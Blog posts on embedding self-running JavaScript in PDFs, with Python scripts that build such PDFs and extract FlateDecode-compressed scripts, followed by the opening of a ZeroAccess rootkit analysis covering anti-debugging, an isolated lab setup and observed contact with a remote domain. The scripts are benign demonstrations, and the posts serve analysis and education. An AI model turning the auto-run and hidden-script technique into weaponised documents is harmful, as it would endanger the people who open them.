<div class="separator" style="clear: both; text-align: center;"></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjaUIp7VpheMy0vsmqT6ZKjPt5I_0IkJzDcYec2e8HGJlg5sPihMLheIepVWIF6FO2JOCsGDdXzF9HbolWqZft67fJ_EnGQ_WB-Net7X01negkaBDuO5F3_1Abtp61X469nlMBilsq9twdE/s1600/Figure1-2(2).PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="140" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjaUIp7VpheMy0vsmqT6ZKjPt5I_0IkJzDcYec2e8HGJlg5sPihMLheIepVWIF6FO2JOCsGDdXzF9HbolWqZft67fJ_EnGQ_WB-Net7X01negkaBDuO5F3_1Abtp61X469nlMBilsq9twdE/s400/Figure1-2(2).PNG" width="400" /></a></div><br />
<span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">Object 8 has three tags we need to include. The first is the “/JS” tag, which stands for JavaScript and holds the JavaScript code we wish to run. In this example I utilize the app object and use the method alert. This allows me to display an alert box when the PDF is opened. “cMsg” defines the message I wish to display within the alert box and “cTitle” is the title header for the box. The second tag is “/S”, which describes the action dictionary and leads to my third tag, “/JavaScript”. </span><span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">In order for my JavaScript to run we must make final adjustments to the PDF document. We must update the xref section of our document to account for the three new objects added.</span><br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgZjiFcNvqF9lJT2oR4ENpObvjgvlrXBdnzr3cE1gwwmK8MYQSF075HjZGORuPnHL1JY4i8r8IvdUux6A1lciw-etB0Fv9vhyH9U91o6HqsQ0j7CmF2VuKxMlnrwitH_BQpNcjx5Qzp90uK/s1600/Figure1-5.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgZjiFcNvqF9lJT2oR4ENpObvjgvlrXBdnzr3cE1gwwmK8MYQSF075HjZGORuPnHL1JY4i8r8IvdUux6A1lciw-etB0Fv9vhyH9U91o6HqsQ0j7CmF2VuKxMlnrwitH_BQpNcjx5Qzp90uK/s1600/Figure1-5.PNG" /></a></div><br />
<span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">The xref table will now list 9 objects and the “/Size” tag in the trailer will change to 9 as well. The last modification to make is in our catalog object, which is our root object 1.</span><br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiiROztrtfWxutY_Nb45Hqvbbchs7qhPTWGFtxpADtm16TUNjP63yK5Oq_5sIw_7lNKinx6FdKLHyldAovN_HsyunW26K80M1YdZxsC23LbuslIve60i14n678D4sJzlJceHdcmBsHDbQhG/s1600/Figure1-6.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiiROztrtfWxutY_Nb45Hqvbbchs7qhPTWGFtxpADtm16TUNjP63yK5Oq_5sIw_7lNKinx6FdKLHyldAovN_HsyunW26K80M1YdZxsC23LbuslIve60i14n678D4sJzlJceHdcmBsHDbQhG/s1600/Figure1-6.PNG" /></a></div><br />
<span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">We must include a reference to our JavaScript object, which is object 6. We use the “/Names” tag in the catalog to set the pointer. Now we have a fully functional PDF that will run the JavaScript when the document is opened. Below is a screenshot of the alert box that is produced by the JavaScript in my example.</span><br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi0Bcoawrez9vSITgJxq9_8mAEMiJbpH5pEJFb3n67gA1T2k0nbggVx4Q_nJmu28PTUcqKGLj1bSL4ns8SfOsl20IlQgMGF79UYf8pUCF9eUmjmE8TKOXD6dXracUV_P-uB4ldtDC59ZtXu/s1600/Figure1-7.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="116" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi0Bcoawrez9vSITgJxq9_8mAEMiJbpH5pEJFb3n67gA1T2k0nbggVx4Q_nJmu28PTUcqKGLj1bSL4ns8SfOsl20IlQgMGF79UYf8pUCF9eUmjmE8TKOXD6dXracUV_P-uB4ldtDC59ZtXu/s400/Figure1-7.PNG" width="400" /></a></div><br />
<div class="MsoNormal" style="margin-bottom: .0001pt; margin-bottom: 0in;"><span style="font-size: large;">3. TextBox Example</span><o:p></o:p></div><span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">Let us look at another example that uses JavaScript to introduce a text box into the PDF document. We can use the template from above and make one simple change to the JavaScript section. In order to modify our JavaScript we only need to change object 8.</span><br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj1XM5QWoplTlrU0s1aG4PFeEcHGLvEObx2xl6gy00AjRfiT4N7QTuWoS6I_Da86PjBFeS_q33jkjletLMycTHar2bSAcIBcHUdNSfJr7W5Oi-u7PzAcsVh8Ui8ygD92iAweKzwJLjmFP_4/s1600/Figure1-8.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="170" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj1XM5QWoplTlrU0s1aG4PFeEcHGLvEObx2xl6gy00AjRfiT4N7QTuWoS6I_Da86PjBFeS_q33jkjletLMycTHar2bSAcIBcHUdNSfJr7W5Oi-u7PzAcsVh8Ui8ygD92iAweKzwJLjmFP_4/s400/Figure1-8.PNG" width="400" /></a></div><br />
<span style="font-family: Calibri, sans-serif;"><span style="font-size: 11pt; line-height: 115%;">Here we have the same tags and only modify what is inside the parentheses. In order to add a text box I use the document object and gain access to it by using “this”. “this” is a pointer to the current document and I am able to create a text box by using the “addField” method. Line 64 shows how I implement this method. “addField” takes four parameters. The first is the name for my text box, and in my example it is simply “My Text Box”. The second parameter is the type of field we wish to add. Since we require a text box I use “text”; however, others such as button are also available. The third parameter is the page of the document. It is an index that begins at zero, and since I want the text box on the first page, the value of the parameter is 0. The last parameter is the position of the text box. Previously, on line 63, I initialize the coordinates of the text box. Position takes a list of four numbers, measuring the box from left-top corner, right-top corner, bottom-left corner, and bottom-right corner. After this change we have a document that produces a text box from the JavaScript we just created. Below you can see a screenshot of the PDF example. In the upper-left corner is the </span><span style="font-size: 15px; line-height: 17px;">text box</span><span style="font-size: 11pt; line-height: 115%;"> that is displayed in gray.</span></span><br />
<br />
<div class="separator" style="clear: both; text-align: center;"></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi-Sv9MUF8QbJ7lxruuBboVuLVweClOg_giZPX8fBYs0MYCwKk7RfUiZudgKbFsxS8w7vJLkuP9sStp4apW88bnDPVeO-7E6iJx2Pv_KBZ3_wLxa1ICy-HV5xxaTDhjGJ8ozNHx1vkRffgl/s1600/Figure1-9(2).PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="124" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi-Sv9MUF8QbJ7lxruuBboVuLVweClOg_giZPX8fBYs0MYCwKk7RfUiZudgKbFsxS8w7vJLkuP9sStp4apW88bnDPVeO-7E6iJx2Pv_KBZ3_wLxa1ICy-HV5xxaTDhjGJ8ozNHx1vkRffgl/s640/Figure1-9(2).PNG" width="640" /></a></div><br />
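Everything the AlertBox and TextBox examples above do by hand, adding objects 6, 7 and 8, updating the xref table and “/Size”, and pointing the catalog’s “/Names” entry at object 6, can be scripted, which also makes the offset bookkeeping explicit. The Python below is an added example and not the PDF from this post: the page content, the alert and text box messages and the field rectangle are constructed here, and the catalog, pages, page and font objects follow the minimal layout of the previous article. build_pdf() writes the file and records each object’s byte offset for the xref table; xref_is_consistent() reads the table back and checks that every offset lands exactly on its “n 0 obj” header, which is the check a hand-edited xref most often fails.

```python
# Added example: build the minimal JavaScript-bearing PDF described in this post
# and compute its xref table. Object numbering follows the post (catalog is 1,
# JavaScript name tree is 6/7/8); page content and messages are constructed here.

def pdf_string(s):
    """Encode a str as a PDF literal string; backslash and parentheses need escaping."""
    return "(" + s.replace("\\", "\\\\").replace("(", "\\(").replace(")", "\\)") + ")"

# Constructed scripts standing in for the two examples in the post.
ALERT_JS = 'app.alert({cMsg: "Hello from my PDF", cTitle: "My Alert"});'
TEXTBOX_JS = ('var rect = [50, 750, 250, 720];'             # position of the field
              'this.addField("My Text Box", "text", 0, rect);')


def build_pdf(js):
    """Return the bytes of a one-page PDF that runs `js` when opened."""
    content = "BT /F1 24 Tf 72 720 Td (Hello World!) Tj ET"
    objects = {
        1: "<< /Type /Catalog /Pages 2 0 R /Names 6 0 R >>",   # root points at the name tree
        2: "<< /Type /Pages /Kids [3 0 R] /Count 1 >>",
        3: "<< /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] "
           "/Contents 4 0 R /Resources << /Font << /F1 5 0 R >> >> >>",
        4: "<< /Length %d >>\nstream\n%s\nendstream" % (len(content), content),
        5: "<< /Type /Font /Subtype /Type1 /BaseFont /Helvetica >>",
        6: "<< /JavaScript 7 0 R >>",                        # /JavaScript tag -> object 7
        7: "<< /Names [(My Code) 8 0 R] >>",                 # names the script -> object 8
        8: "<< /S /JavaScript /JS %s >>" % pdf_string(js),   # the action carrying the code
    }
    out = bytearray(b"%PDF-1.6\n")
    offsets = {}
    for num in sorted(objects):
        offsets[num] = len(out)              # byte offset of "n 0 obj": what xref records
        out += ("%d 0 obj\n%s\nendobj\n" % (num, objects[num])).encode("latin-1")
    xref_pos = len(out)
    size = max(objects) + 1                  # /Size counts the free object 0 too: 9 here
    out += ("xref\n0 %d\n" % size).encode()
    out += b"0000000000 65535 f \n"          # object 0 is always the head of the free list
    for num in sorted(objects):
        out += ("%010d 00000 n \n" % offsets[num]).encode()   # fixed 20-byte entries
    out += ("trailer\n<< /Size %d /Root 1 0 R >>\nstartxref\n%d\n%%%%EOF\n"
            % (size, xref_pos)).encode()
    return bytes(out)


def xref_offsets(pdf):
    """Parse the classic xref table back out of `pdf` as {object number: offset}."""
    start = int(pdf[pdf.rindex(b"startxref") + len(b"startxref"):].split()[0])
    lines = pdf[start:].split(b"\n")
    if lines[0] != b"xref":
        raise ValueError("startxref does not point at an xref table")
    first, count = (int(x) for x in lines[1].split())
    offsets = {}
    for i in range(count):
        offset, _generation, kind = lines[2 + i].split()
        if kind == b"n":                     # in-use entry
            offsets[first + i] = int(offset)
    return offsets


def xref_is_consistent(pdf):
    """True when every xref offset lands exactly on its 'n 0 obj' header."""
    return all(pdf[off:].startswith(b"%d 0 obj" % n) for n, off in xref_offsets(pdf).items())


if __name__ == "__main__":
    data = build_pdf(ALERT_JS)
    with open("alert.pdf", "wb") as fh:      # open in a viewer that runs JavaScript
        fh.write(data)
    print("xref consistent:", xref_is_consistent(data))
```

Swap TEXTBOX_JS for ALERT_JS to produce the second example; only object 8 changes, exactly as the post describes. Writing the xref from measured offsets rather than by hand is also why, in the next article, a file re-saved by Acrobat shows offsets that were “automatically calculated”.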
<div class="MsoNormal" style="margin-bottom: .0001pt; margin-bottom: 0in;"><span style="font-size: large;">4. Conclusion</span></div><span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">To sum up, we have seen two examples of how to incorporate JavaScript into a PDF document: I used JavaScript to display an alert box and to add a text box. Many more objects and methods can be controlled from JavaScript; the full list is in the Acrobat JavaScript Scripting Guide <a href="http://partners.adobe.com/public/developer/en/acrobat/sdk/AcroJSGuide.pdf" target="_blank">[2]</a>. In the next article I will show how to extract JavaScript from a PDF and how to decode the streams in which it is stored, which are normally compressed with filters such as FlateDecode, so that the script cannot be found with a plain string search.</span><br />
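<div><span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">The following Python script is an added worked example and not code from the original article. It serves both the text-box discussion above and the extraction topic announced for the next article: it builds a minimal one-page PDF whose /OpenAction runs the same two Acrobat JavaScript actions, an alert box and an addField call with the rectangle in [upper-left x, upper-left y, lower-right x, lower-right y] order, stores the script in a FlateDecode-compressed stream the way real samples do, and then recovers the script by walking the objects, resolving the /JS reference and inflating the stream. The file layout, object numbers and script text are my own choices. The extractor handles only a direct /Length, a /JS entry given as an indirect reference or a literal string, and the FlateDecode filter; that is enough for this file, not for every malicious PDF.</span></div>

```python
import re
import zlib

# PDF dictionary delimiters, written as escapes (two "less-than" and two
# "greater-than" signs) so the listing embeds cleanly in an HTML page.
DICT_OPEN, DICT_CLOSE = b"\x3c\x3c", b"\x3e\x3e"

# Acrobat JavaScript for the /OpenAction (constructed for this example): the
# alert box and the text field from the article. The last argument of
# addField is the bounding rectangle in rotated user space, ordered
# [upper-left x, upper-left y, lower-right x, lower-right y].
OPEN_ACTION_JS = (
    'app.alert("Hello from the PDF");\n'
    'var rect = [50, 750, 250, 700];\n'
    'var f = this.addField("My Text Box", "text", 0, rect);\n'
    'f.value = "created by JavaScript";\n'
)


def pdf_dict(**entries):
    """Serialise keyword arguments as a PDF dictionary, e.g. /Type /Catalog."""
    body = b" ".join(b"/" + k.encode() + b" " + v for k, v in entries.items())
    return DICT_OPEN + b" " + body + b" " + DICT_CLOSE


def build_pdf(script, compress=True):
    """Return a one-page PDF whose /OpenAction runs `script` when opened.
    With compress=True the script stream is deflated and tagged /FlateDecode,
    which is why `strings` on a typical malicious PDF shows no JavaScript."""
    data = script.encode("latin-1")
    extra = {}
    if compress:
        data = zlib.compress(data)
        extra["Filter"] = b"/FlateDecode"
    objects = [                                                # objects 1..5
        pdf_dict(Type=b"/Catalog", Pages=b"2 0 R", OpenAction=b"4 0 R"),
        pdf_dict(Type=b"/Pages", Kids=b"[3 0 R]", Count=b"1"),
        pdf_dict(Type=b"/Page", Parent=b"2 0 R", MediaBox=b"[0 0 612 792]"),
        pdf_dict(Type=b"/Action", S=b"/JavaScript", JS=b"5 0 R"),
        pdf_dict(Length=str(len(data)).encode(), **extra)
        + b"\nstream\n" + data + b"\nendstream",
    ]
    out, offsets = bytearray(b"%PDF-1.4\n"), []
    for num, body in enumerate(objects, start=1):
        offsets.append(len(out))                   # byte offset recorded in xref
        out += b"%d 0 obj\n" % num + body + b"\nendobj\n"
    xref_pos = len(out)
    out += b"xref\n0 %d\n0000000000 65535 f \n" % (len(objects) + 1)
    for off in offsets:
        out += b"%010d 00000 n \n" % off
    out += b"trailer\n" + pdf_dict(Size=str(len(objects) + 1).encode(), Root=b"1 0 R")
    out += b"\nstartxref\n%d\n%%%%EOF\n" % xref_pos
    return bytes(out)


OBJ_RE = re.compile(rb"(\d+) 0 obj(.*?)endobj", re.S)


def parse_objects(pdf):
    """Map object number to body for every `n 0 obj ... endobj` in the file."""
    return {int(m.group(1)): m.group(2) for m in OBJ_RE.finditer(pdf)}


def decode_stream(body):
    """Return a stream's data using its direct /Length, inflating FlateDecode.
    Indirect /Length values, other filters and object streams are not handled."""
    length = re.search(rb"/Length\s+(\d+)", body)
    keyword = body.find(b"stream")
    if length is None or keyword == -1:
        return None
    start = body.index(b"\n", keyword) + 1         # data begins after the EOL
    data = body[start:start + int(length.group(1))]
    if b"/FlateDecode" in body[:keyword]:          # filter named in the dictionary
        data = zlib.decompress(data)
    return data


def extract_javascript(pdf):
    """Return every script reachable through a /JS entry, decoded to text."""
    objects, scripts = parse_objects(pdf), []
    for body in objects.values():
        ref = re.search(rb"/JS\s+(\d+)\s+0\s+R", body)
        if ref is not None:                        # /JS refers to a stream object
            target = objects.get(int(ref.group(1)))
            data = decode_stream(target) if target is not None else None
            if data is not None:
                scripts.append(data.decode("latin-1"))
            continue
        literal = re.search(rb"/JS\s*\((.*?)\)", body, re.S)
        if literal is not None:                    # /JS holds a literal string
            scripts.append(literal.group(1).decode("latin-1"))
    return scripts


def xref_offsets_valid(pdf):
    """Cross-check that each xref entry points at its `n 0 obj` header."""
    xref_pos = int(re.search(rb"startxref\s+(\d+)", pdf).group(1))
    if not pdf.startswith(b"xref", xref_pos):
        return False
    entries = re.findall(rb"(\d{10}) (\d{5}) ([nf])", pdf[xref_pos:])
    for num, (off, _gen, kind) in enumerate(entries):
        if kind == b"n" and not pdf.startswith(b"%d 0 obj" % num, int(off)):
            return False
    return True
```

<div><span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">Writing the result of build_pdf(OPEN_ACTION_JS) to a file and opening it in a viewer with JavaScript enabled shows the alert and the field; running extract_javascript on the same bytes returns the script even though the compressed file contains no readable trace of it. The literal-string branch stops at the first closing parenthesis, so a script containing nested parentheses needs a proper string parser.</span></div>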
<div class="MsoNormal" style="margin-bottom: .0001pt; margin-bottom: 0in;"><span style="font-size: large;"><br />
</span></div><div class="MsoNormal" style="margin-bottom: .0001pt; margin-bottom: 0in;"><span style="font-size: large;">References</span></div><div style="margin-bottom: .0001pt; margin: 0in;"><span style="font-family: Calibri, sans-serif; font-size: 11pt;">[1] "Document Management - Portable Document Format", available at <a href="http://www.adobe.com/devnet/pdf/pdf_reference.html">http://www.adobe.com/devnet/pdf/pdf_reference.html</a></span></div><div style="margin-bottom: .0001pt; margin: 0in;"><span style="font-family: Calibri, sans-serif; font-size: 11pt;">[2] "Acrobat JavaScript Scripting Guide", available at <a href="http://partners.adobe.com/public/developer/en/acrobat/sdk/AcroJSGuide.pdf">http://partners.adobe.com/public/developer/en/acrobat/sdk/AcroJSGuide.pdf</a></span></div>
<div><span style="font-size: large;">ZeroAccess Rootkit - Part 1</span></div><div><span style="font-family: Calibri, sans-serif; font-size: 11pt;">Posted 2012-02-20, last updated 2012-03-20.</span></div><span style="font-family: Calibri, sans-serif; font-size: large; line-height: 115%;"><b><u>Abstract:</u></b></span><br />
<div style="text-align: justify;"><span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">This series of articles presents an analysis of a rootkit named ZeroAccess. This malware, also known as Max++, is a devious piece of code that works at kernel level to bypass virus scanners, and it continues to evolve with each new release found in the wild. Throughout this series I will explore the INT 2D instruction, an anti-debugging technique employed by this malware. INT 2D causes the byte that follows it to be skipped, and the way execution continues afterwards depends on whether a debugger is attached; ZeroAccess uses this to prevent accurate analysis and ultimately to extend the lifespan of the program. Furthermore, I will present experiments and results that show the dynamic behavior of the INT 2D instruction and which factors, including the debugging environment, change its execution. In the following articles I will continue to reverse engineer ZeroAccess and analyze how it manages to infect a system driver, modify the export table, encode its own export table, create a hidden partition, and ultimately remain hidden while it takes control of an unsuspecting user's computer.</span></div><div style="text-align: justify;"><span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;"><br />
</span></div><div style="text-align: justify;"><span style="font-family: Calibri, sans-serif; font-size: large; line-height: 115%;"><b>1. Background Information</b></span></div><div style="text-align: justify;"><span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">Malware is short for malicious software. Viruses, trojans, spyware and rootkits are all examples of malware. They are undesired and deceptive programs installed on a victim’s computer without consent, with the goal of exploiting that computer for various purposes. One reason that hackers write and release malware is reputation or personal curiosity. Today the more common motive is profit: malware is written for financial gain. One example of this kind of malware is the rootkit named ZeroAccess.</span></div><div style="text-align: justify;"><span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;"><br />
</span></div><div style="text-align: justify;"><span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">ZeroAccess was first seen by VirusTotal on January 24, 2010. It is a very advanced rootkit that runs in kernel mode and targets Windows machines. ZeroAccess utilizes undocumented system features and employs sophisticated anti-forensic techniques to avoid analysis and increase its lifespan. When a system is infected with ZeroAccess, Windows system files are modified and kernel hooks are created. Once the hooks are in place, the program is able to hide its processes and network connections. It also has the ability to avoid detection and removal by antivirus scanners: if antivirus software attempts to access its files or processes, ZeroAccess immediately kills that process and disables the antivirus software.</span></div><br />
<div style="font-size: 11pt; text-align: justify;"><span style="font-family: Calibri, sans-serif; line-height: 115%;"><span style="font-size: 11pt; line-height: 115%;"><br />
</span></span></div><div style="text-align: justify;"><span style="font-family: Calibri, sans-serif; line-height: 115%;"><span style="font-size: large; line-height: 115%;"><b>2. Network Behavior</b></span></span></div><div style="font-size: 11pt; text-align: justify;"><div class="MsoNormal" style="line-height: 150%;"><span style="font-family: Calibri, sans-serif; line-height: 115%;">Let us first analyze a system infected with the Max++ rootkit and check the network traffic of the compromised system. To run an instance of the malware safely, I set up a virtual environment with VirtualBox. I used two virtual systems: a machine running <i>Windows XP Service Pack 2</i>, and a second one running <i>Ubuntu</i>. Because I expected Max++ to hide its communications on the infected Windows XP system, I routed all network traffic from the Windows system through the Ubuntu system, where the packet sniffer <i>Wireshark</i> inspects every incoming and outgoing packet. My goal was to find any request that Max++ makes to contact a remote server. For the Windows machine I configured the network adapter in VirtualBox as an internal network, so the infected guest can reach neither the host nor the outside world except through the Ubuntu gateway. <i>Figure 1.1</i> displays my configuration for the Windows guest machine.</span></div></div><div style="font-size: 11pt; text-align: justify;"><span style="font-family: Calibri, sans-serif; line-height: 115%;"><span style="font-size: 11pt; line-height: 115%;"><br />
</span></span></div><div class="separator" style="clear: both; font-size: 11pt; text-align: center;"><span style="font-family: Calibri, sans-serif; line-height: 115%;"><br />
</span></div><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="font-size: 11pt; margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiq7ZAGzRWs86MYJ90MyY_y06qsbNWb7vtdDPsPiSitwnKJFVB6PdTrS31sDj9HmPv1dcKUDFSNcufcn1sybWNJmu_YscDD41qksQp4un5_59kPBdMQlAtelcsw7Yna1ysIruFwstSeEXq5/s1600/Figure+1-1.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="336" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiq7ZAGzRWs86MYJ90MyY_y06qsbNWb7vtdDPsPiSitwnKJFVB6PdTrS31sDj9HmPv1dcKUDFSNcufcn1sybWNJmu_YscDD41qksQp4un5_59kPBdMQlAtelcsw7Yna1ysIruFwstSeEXq5/s400/Figure+1-1.png" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 1.1 - Network configuration for the Windows XP virtual system</td></tr>
</tbody></table><div style="font-size: 11pt; text-align: justify;"><span style="font-family: Calibri, sans-serif; line-height: 115%;"><span style="font-size: 11pt; line-height: 115%;"><br />
</span></span></div><div style="font-size: 11pt; text-align: justify;"><span style="font-family: Calibri, sans-serif; line-height: 115%;"><span style="font-size: 11pt; line-height: 115%;">I also enabled hardware virtualization (VT-x/AMD-V), because Max++ makes use of hardware breakpoints, that is, the x86 debug registers. <i>Figure 1.2</i> shows the system configuration of the Windows guest.</span></span></div><div style="font-size: 11pt; text-align: justify;"><span style="font-family: Calibri, sans-serif; line-height: 115%;"><span style="font-size: 11pt; line-height: 115%;"><br />
</span></span></div><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="font-size: 11pt; margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj0SAbXTJe_jxSRg01O1OPLaH6iOvBDGjZniCRP4sViobzEoHWPjJomnPA7Gg1Dn0NoWu9jmz8Wk9FZ4UCp3qirekct631vB-6-ZNUE0sEp9VMM_lzIde0Qm4y_MBCR49x2EqaCop5e-FGK/s1600/Figure+1-2.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="336" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj0SAbXTJe_jxSRg01O1OPLaH6iOvBDGjZniCRP4sViobzEoHWPjJomnPA7Gg1Dn0NoWu9jmz8Wk9FZ4UCp3qirekct631vB-6-ZNUE0sEp9VMM_lzIde0Qm4y_MBCR49x2EqaCop5e-FGK/s400/Figure+1-2.png" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 1.2 - System configuration for the Windows XP virtual system</td></tr>
</tbody></table><div style="font-size: 11pt; text-align: justify;"><span style="font-family: Calibri, sans-serif; line-height: 115%;"><span style="font-size: 11pt; line-height: 115%;"><br />
</span></span></div><div style="font-size: 11pt; text-align: justify;"><span style="font-family: Calibri, sans-serif; line-height: 115%;"><span style="font-size: 11pt; line-height: 115%;">Second, I configured the first network adapter of the Ubuntu machine to use the same internal network, so that it receives the traffic from the Windows guest. <i>Figure 1.3</i> shows the settings for this adapter.</span></span></div><div style="font-size: 11pt; text-align: justify;"><span style="font-family: Calibri, sans-serif; line-height: 115%;"><span style="font-size: 11pt; line-height: 115%;"><br />
</span></span></div><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="font-size: 11pt; margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiDvOEQZgUuIbP8BBUvt-tCULaL4l2bc7E73uotyxKPqnzuKq26dy-EVpxPqU-6XBVKBJ63p9GcJwHTp-Ii7G_zN18uxd07qI9wZd-KngabUCckYm1ni-q3I3OyZkMpIUhmPx7Rko9mK4na/s1600/Figure+1-3.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="336" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiDvOEQZgUuIbP8BBUvt-tCULaL4l2bc7E73uotyxKPqnzuKq26dy-EVpxPqU-6XBVKBJ63p9GcJwHTp-Ii7G_zN18uxd07qI9wZd-KngabUCckYm1ni-q3I3OyZkMpIUhmPx7Rko9mK4na/s400/Figure+1-3.png" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 1.3 - Network configuration for adapter #1 in the Ubuntu virtual system</td></tr>
</tbody></table><div style="font-size: 11pt; text-align: justify;"><span style="font-family: Calibri, sans-serif; line-height: 115%;"><span style="font-size: 11pt; line-height: 115%;"><br />
</span></span></div><div style="font-size: 11pt; text-align: justify;"><span style="font-family: Calibri, sans-serif; line-height: 115%;"><span style="font-size: 11pt; line-height: 115%;">I also enabled a second network adapter in the Ubuntu system, which gives it access to the host's internet connection; the Ubuntu machine therefore acts as the gateway between the isolated internal network and the outside world, and every packet the infected guest sends has to pass through it. <i>Figure 1.4</i> shows the settings for this adapter.</span></span></div><div style="font-size: 11pt; text-align: justify;"><span style="font-family: Calibri, sans-serif; line-height: 115%;"><span style="font-size: 11pt; line-height: 115%;"><br />
</span></span></div><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="font-size: 11pt; margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgTkIOKegpIAUyu73COPDOMtLgSX_yjBhcIrgKgtnwMQt_6q20LDfbqBMBmpltLY3orN5axtyWzeveI2qYArFiLRAm67XaYddQMvA-UZRjpVJH20qjhMwepzxWwXhD_kkjPI30C2yr6q14U/s1600/Figure+1-4.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="336" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgTkIOKegpIAUyu73COPDOMtLgSX_yjBhcIrgKgtnwMQt_6q20LDfbqBMBmpltLY3orN5axtyWzeveI2qYArFiLRAm67XaYddQMvA-UZRjpVJH20qjhMwepzxWwXhD_kkjPI30C2yr6q14U/s400/Figure+1-4.png" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 1.4 - Network configuration for adapter #2 in the Ubuntu virtual system</td></tr>
</tbody></table><div style="font-size: 11pt; text-align: justify;"><span style="font-family: Calibri, sans-serif; line-height: 115%;"><span style="font-size: 11pt; line-height: 115%;"><br />
</span></span></div><div style="font-size: 11pt; text-align: justify;"><span style="font-family: Calibri, sans-serif; line-height: 115%;"><span style="font-size: 11pt; line-height: 115%;">To complete the setup of the two virtual systems I also had to enable IP forwarding on the Ubuntu machine and determine the DNS server to use, so that the Windows guest had internet connectivity through Ubuntu. With the systems set up I could use <i>Wireshark</i> on the Ubuntu machine to monitor all network traffic from the Windows system. An important note here: always take a snapshot of the virtual system before the malware is run, so that the machine can be restored to an uninfected state. When the malware executable was run on the Windows guest, the file disappeared: the malware deletes itself from the folder. At this point the system was infected, and <i>Wireshark</i> let us observe any suspicious activity. <i>Figure 1.5</i> shows the output of <i>Wireshark</i> after Max++ is executed. There is a DNS query for “intensedive.com”, and a standard query response associated with the IP address 64.74.223.42.</span></span></div><div style="font-size: 11pt; text-align: justify;"><span style="font-family: Calibri, sans-serif; line-height: 115%;"><span style="font-size: 11pt; line-height: 115%;"><br />
</span></span></div><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="font-size: 11pt; margin-left: auto; margin-right: auto; text-align: center;"><tbody>
